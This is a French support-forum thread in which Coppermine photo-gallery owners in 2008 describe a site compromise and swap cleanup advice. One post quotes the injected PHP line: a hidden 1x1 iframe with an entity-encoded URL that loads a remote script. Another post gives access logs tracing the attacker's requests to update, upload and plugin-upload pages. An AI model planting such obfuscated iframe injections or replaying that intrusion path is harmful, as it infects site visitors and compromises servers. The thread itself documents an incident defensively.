Galerie attaquée ?

[mafieuso]

Bonjour,

J'ai l'impression que ma galerie à subit une attaque, elle est inaccessible et il y a des morceaux de codes bizarres dans certaines pages...

Voici par exemple le message que j'ai sur la passage d'acceuil :

Parse error: syntax error, unexpected '<' in /mnt/123/sdb/9/2/galeriebar/coppermine/anycontent.php on line 33

On retrouve ce code ajouté à plusieurs pages :

Code Select Expand

<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'; ?>


Que dois-je faire ?


Merci de votre aide !

[Pascal YAP]

Aïe,
C'est exact !
Il y a effectivement un "exploit" qui injecte des IFRAMEs chargés de code PHP.

Je ne connais pas actuellement d'autres solutions que celles d'Uploader des fichiers "propres".
On ne doute pas que le problème semble sérieux, sans être destructeur...

Y-a-t-il un CMS tel Joomla ou SMF sur votre web ?

PYAP

ps : je connais hélas ce problème depuis le 03 Avril 2008 

[mafieuso]

Je vais envoyer les fichiers propres et en profiter pour passer la galerie en 1.4.16, je suis actuellement en 1.4.14 !

J'ai du mal à comprendre comment ce code à réussi à être injecté, est-ce que quelqu'un pourrait m'expliquer ?

En fait j'ai été averti par un membre pour lequel son antivirus (Kaspersky) lui à indiqué la présence de ce script malicieux 'Trojan-télécharger.JS.Psyme.yc' mais je ne le trouve nul part et comment savoir si ce script à infecté mon ordinateur (ou celui d'autres membres) ? Est-ce qu'il faut faire une manipulation particulière pour qu'il s'active ?

[Pascal YAP]

La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !

[mafieuso]

Tu as le lien de la discussion ?

Sinon est-ce que la 1.4.16 corrige cette faille de sécurité ou autant attendre quelques jours la 1.4.17 ? Car en fait j'ai des modifications de certains fichiers php et c'est toujours chiant de devoir ensuite retrouver ce qu'on à modifié manuellement !

D'ailleurs à quand une méthode de mise à jour digne de ce nom chez Coppermine ? Marre de devoir envoyer tous les fichiers comme un barbare à chaque mise à jour...

[mafieuso]

Je fais un double message pour vous informer de quelque chose d'important :

Ce fichier malicieux m'a édité la base de donnée !!! Le contenu de la table config était complètement chamboulé, je l'ai remplacé par l'ancien mais j'aimerais bien savoir s'il n'a pas édité autre chose, surtout que s'il peut accéder à la bdd il peut très bien tout supprimer !

[poubao]

Bonjour,
Moi dimanche, je n'ai eu que les fichiers du plugin onlinestats de modifiés, tous les fichiers, y compris les fichiers langues, solution, désactiver ce plugin, (pour mon cas !!)
par précaution, effacement de tous les fichiers présents sur le serveur (je posséde une sauvegarde récente de toute ma galerie, y compris le répertoire Album),
Réinstallation complête, j'en ai profité pour modifier tous les mots de passes d'accés au serveur et aux bases de données.
Coppermine n'est pas la seule application qui ait été sujette à cette attaque.
La mise à jour vers CPG 1.416, semble limiter les dégats car je n'ai pas eut de modification de la BDD.
poubao

[Feerie21]

Je viens également de subir cette "attaque", est-ce qu'il y a un moyen d'arranger sa, en remplacant certain fichier ? en supprimant ? 

[François Keller]

plusieurs personnes semblent être l'objet de cette attaque qui ne semble pas liée à coppermine puisque d'autres applications sont touchées.
Pour l'instant il n'y a pas de solution précise si ce n'est que ceux qui utilisent la version 1.4.16 sont moins touchés...
à suivre donc

[Pascal YAP]

La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !

La discussion est impossible avec l'hébergeur... possédant la sciences infuse

[mafieuso]

Je ne comprends pas le code malveillant est encore présent sur ma galerie mais avant le déclaration de doctype de la page, quel est le fichier qui est infecté ? Je ne le trouve pas...

[mafieuso]

C'était un plugins autant pour moi...

[poubao]

Le quel?
poubao

[Pascal YAP]

La discussion est impossible avec l'hébergeur... possédant la sciences infuse

Le quel?
poubao

Celui qui commence par ***, et qui est connu pour ces //// 

C'était un plugins autant pour moi...

Le quel?
poubao

A mon humble avis, tous les scripts semblent être perméables 

[mafieuso]

Le quel?
poubao

Tous, j'avais oublié d'envoyer de ré envoyer le dossier !

[Coline]

J'ai également un virus sur la galerie, un logiciel veut se lancer,
Il se nomme cdpuvbhfzz
Comment faire pour l'enlever?
Est ce le même que vous?
merci

[mafieuso]

Je crains que oui... mais chez moi rien ne voulait se lancer c'est bizarre, est-ce que ça dépend du navigateur ?

[Coline]

Chez moi ça se lance mais ça fait des choses bizarres (tous ce décalle)

[DavidG]

J'ai aussi subi cette attaque (3 fois) depuis ce WE. J'étais en version 1.4.14 et j'ai fais une mise à jour en 1.4.16 mais l'attaque a recommencé ce soir. Tous les fichiers php et html sont modifiés (ajout de IFRAME). L'attaque vient d'une IP russe ! voici le log de l'attaque de ce soir :

Code Select Expand

ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:43 +0200] "GET /copper/ HTTP/1.1" 200 39035 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:48 +0200] "GET /copper/update.php HTTP/1.1" 200 31881 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:49 +0200] "POST /copper/upload.php HTTP/1.1" 200 8607 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 13653 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 8497 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:52 +0200] "POST /copper/admin.php HTTP/1.1" 200 8441 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:30 +0200] "GET /copper/?ff=1 HTTP/1.1" 200 18781 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:31 +0200] "GET /copper/ HTTP/1.1" 200 22137 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

en version 1.4.14 le log était différent :

Code Select Expand

ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:54 +0200] "GET /copper/ HTTP/1.1" 200 68683 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:58 +0200] "GET /copper/update.php HTTP/1.1" 200 40384 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:59 +0200] "POST /copper/pluginmgr.php?op=upload HTTP/1.1" 302 47195 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:29:30 +0200] "GET /copper/plugins/docs.php HTTP/1.1" 200 14 "-" "Mozilla/8.0"


[Coline]

Mais comment faire?
On doit remettre les fichiers de la maj 1.4.6?